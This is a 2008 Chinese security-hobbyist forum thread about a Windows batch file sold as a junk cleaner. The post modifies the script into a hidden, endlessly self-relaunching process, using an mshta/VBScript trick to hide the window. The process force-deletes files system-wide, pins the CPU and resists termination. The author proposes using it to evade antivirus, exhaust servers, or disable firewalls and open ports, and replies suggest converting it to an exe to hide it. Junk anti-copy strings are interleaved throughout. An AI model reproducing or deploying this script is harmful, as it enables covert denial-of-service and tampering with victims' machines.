标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
[打印本页]
作者:
平湖秋月
时间:
2008-9-13 23:51
标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序 说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!
1 F, j7 y' B, _7 E
a.bat源代码如下:
- {% r3 q1 _/ |! v3 z y" X6 c
& _2 j, m, b8 y7 m7 J. P9 O/ h
& C, A# R6 l; k2 M$ a2 Z; g3 O
===可以直接保存改名a.bat=====================
, r3 y v2 a' N& S) p
@echo off
- a8 G# L8 G; C, W
echo 正在清除系统垃圾文件,请稍等......
1 e0 V# X2 q3 o: q, w
@del /f /s /q %systemdrive%\*.tmp
* J7 X3 ~+ |; B
@del /f /s /q %systemdrive%\*._mp
6 d% N- X& q4 g% A
@del /f /s /q %systemdrive%\*.log
* |1 p F5 V' A5 U! i; E
@del /f /s /q %systemdrive%\*.gid
/ g# x+ R' O l/ h) l
@del /f /s /q %systemdrive%\*.chk
" t& ~0 N7 r' b
@del /f /s /q %systemdrive%\*.old
- G( I' u+ A5 \9 G3 a& T
@del /f /s /q %systemdrive%\recycled\*.*
9 O3 ?$ f. _$ S
@del /f /s /q %windir%\*.bak
4 E; ?3 O2 N" W T" C0 k3 B
@del /f /s /q %windir%\prefetch\*.*
1 a4 s, z+ ~ G9 H0 x
@rd /s /q %windir%\temp & md %windir%\temp
/ k! i R+ a" V* s
@del /f /q %userprofile%\cookies\*.*
0 @3 l+ q8 @0 J2 o, [# b
@del /f /q %userprofile%\recent\*.*
* U5 V8 x, U* `( [3 P& c: |( y" a4 O
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
8 S9 l% ~/ ^' U; L; n' T, i, N
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
6 q' ^+ }* S. r
@del /f /s /q "%userprofile%\recent\*.*"
1 x3 _* e# A: l+ j; G
echo 清除系统LJ完成!
! V" n: r' _( f0 @
其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:
2 u6 g& B6 h0 R9 K" r4 J
) H' h: o. k; q7 {! T9 M
===可以直接保存改名为a.bat
(一定要是a.bat哦具体说明原因你应该明白吧======
6 O4 T. z- R$ @ K; ~- w
@echo off
. d5 c7 U) @) F
if "%1" == "h" goto begin
0 d0 E3 O" o' ?4 O R
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
) ?" ]9 Q8 z5 O
:begin
+ J3 ~- @4 s6 H9 j
echo 正在清除系统垃圾文件,请稍等......
9 M, ?& ^( I- b+ e- n
@@del /f /s /q %systemdrive%\*.tmp
, L" c' u, f% J/ M
@del /f /s /q %systemdrive%\*._mp
3 O1 `2 \* O7 D( w8 R* r
@del /f /s /q %systemdrive%\*.log
5 T7 ^0 F( d; j0 L8 f+ R% `% W
@del /f /s /q %systemdrive%\*.gid
4 w* Q5 N4 q9 ?- H8 {. `2 X
@del /f /s /q %systemdrive%\*.chk
1 d# N3 E. V3 {. ?6 t
@del /f /s /q %systemdrive%\*.old
2 F: Z4 b( X3 T/ E. Q# }
@del /f /s /q %systemdrive%\recycled\*.*
; u! ]# G0 G* R( w+ O
@del /f /s /q %windir%\*.bak
8 z! Q7 n) m# U* w
@del /f /s /q %windir%\prefetch\*.*
6 Y/ Z) i4 V+ v6 K, M8 C" \
@rd /s /q %windir%\temp & md %windir%\temp
2 l+ l6 k# Y; [6 T' J8 Q4 H8 C+ x
@del /f /q %userprofile%\cookies\*.*
; H3 y8 D& m- r
@del /f /q %userprofile%\recent\*.*
" \, _* P; D& x ?7 n
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
$ b8 ^0 A4 m( ], \! u( h4 b
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
, f m: m( }9 S' g1 I" `
@del /f /s /q "%userprofile%\recent\*.*"
1 q/ m: F5 y: r F# O8 R. v
echo 清除系统LJ完成!
. ]. Y% r6 {. X! p' a f
call a.bat
+ Y( z$ p2 U" b3 E9 P5 n4 y; `/ i
运行看看!什么效果?
; l% [0 l5 X8 L4 s" G2 Y R- I+ y2 H. k
对话框消失了!打开任务管理器查看显示CPU运用:100% 看进程里面cmd.exe占用CPU:99 本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
( f! q0 q3 u6 k: U0 u# I& l9 H8 ^
1 k% _' c9 u* s4 ^
你说,我们可以利用这个BAT做些什么:
4 q: T5 t: P! i4 B) A
- P; _3 l1 o$ h& \- p4 l& b1 X
1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
: \/ m3 T/ C5 ~6 H
2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?
4 q0 b& S: i1 R0 j9 \- q
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月
作者:
上帝的爱
时间:
2008-9-14 05:03
想法非常不错
作者:
柔肠寸断
时间:
2008-9-14 17:34
打个岔,流氓的应用,呵呵
作者:
柔肠寸断
时间:
2008-9-14 17:38
现在来正经的回答下问题:
$ `! T/ [; c r' a* F: k3 I
1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了
! h9 E n/ ~/ ^, W7 }
. c* c2 x/ ] @0 i0 O0 T; }
2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者:
问道小生
时间:
2008-9-14 19:03
其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~
; h# q4 A& M& @+ ?' D8 s Y- s
部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者:
平湖秋月
时间:
2008-9-15 21:43
楼上的你们说的都有道理 理论上是成立的 我有时间试试看
欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)
Powered by Discuz! 7.2
